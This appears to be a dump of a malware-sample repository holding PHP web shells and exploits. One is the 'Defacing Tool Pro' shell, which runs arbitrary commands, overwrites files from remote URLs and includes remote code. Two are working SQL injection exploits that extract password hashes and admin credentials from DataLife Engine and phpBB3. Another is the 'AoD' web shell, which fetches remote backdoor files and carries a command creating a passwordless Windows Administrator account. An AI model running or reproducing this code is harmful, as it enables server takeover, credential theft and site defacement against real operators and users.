function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+cmdField.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ]<br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="cForm" id="cForm" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmdField" type="text" id="cmdField" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);
ob_start();
function safemode($what){echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";}
function popenn($what){$handle=popen("$what", "r");$out=@fread($handle, 2096);echo $out;@pclose($handle);}
function execc($what){exec("$what",$array_out);$out=implode("\n",$array_out);echo $out;}
function shell($what){echo(shell_exec($what));}
$funE="function_exists";
if($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
else {$fe="safemode";$feshow=$fe;}
if($fu!="" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir &lt;diretorio&gt;; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>

98
PHP/Exploit.PHP.Inject.e Normal file
View File

@ -0,0 +1,98 @@
<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+========================================+
| RST/GHC Datalife SQL injection exploit |
+========================================+
< > Lite Version for DLE <=4.1 < >
';
if ($argc < 2 ){
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}
//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);
if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));
print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";
//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
else {$prefix = $argv[3];}
$min = 48; # 0
$max = 122; # z
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();}
for ($sn=1; $sn <= 32; $sn++) {
blind($sn, $min, $max);
}
credits();
// REQUEST function
function check($crcheck, $sn)
{
global $argv, $user_id, $prefix;
$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
$name = $argv[2]; #user name
$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #
$http = $host . $query;
#DEBUG
#print $http . "\n";
$result = file_get_contents($http);
// checking the answer
$string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;
if (eregi($string, $result)) { return 1; }
return 0;
}
//range function
function blind($sn, $fmin, $fmax)
{
if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;}
$compare = intval($fmin + ($fmax-$fmin)/2);
$crcheck = ">". $compare;
if ( check($crcheck, $sn) == 1 ) {
blind($sn, $compare, $fmax);
}
else {
blind($sn, $fmin, $compare+1); }
}
//brute function
function crack($cmin, $cmax, $sn)
{
for ($i=$cmin; $i <=$cmax; $i++){
$crcheck = "=$i";
if (check($crcheck, $sn) == 1){print chr($i); return 1;}
}
return 0;
}
function credits(){
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC";
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
exit;
}
?>

293
PHP/Exploit.PHP.Inject.h Normal file
View File

@ -0,0 +1,293 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

BIN
PHP/Exploit.PHP.Userpic.a Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 7.2 KiB

503
PHP/Exploit.PHP.e Normal file
View File

@ -0,0 +1,503 @@
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By xIgOr > AoD > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
#udp @ irc.mildnet.org
<!--
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://legiaourbana.itafree.com/cmd/list.txt?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>,&nbsp;the&nbsp;archive&nbsp;is&nbsp;validates&nbsp;and&nbsp;was&nbsp;loaded&nbsp;successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>,&nbsp;directory&nbsp;created successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;creates&nbsp;directory.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>,&nbsp;created successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;tries&nbsp;it&nbsp;creates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;archive!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;archive!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;directory!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;directory!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>";
} else {
$msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font>&nbsp;<font color=\"#000080\">{$file}</font>&nbsp;<font color=\"#008000\">named for</font>&nbsp;<font color=\"#000080\">{$newname}</font>&nbsp;<font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;nominates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>,&nbsp;<font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying</font>&nbsp;<font color=\"#000000\">{$file}</font>&nbsp;<font color=\"#FF0000\">for</font>&nbsp;<font color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\\\\\\\\n"; }
$data="\\\\\\\\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\\\\\\\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\\\\\\\\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\\\\\\\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\\\\\\\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\\\\\\\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\\\\\\\\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\\\\\\\\n";
zip_entry_close($zip_entry);
}
echo "\\\\\\\\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing&nbsp;{$file}&nbsp;...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
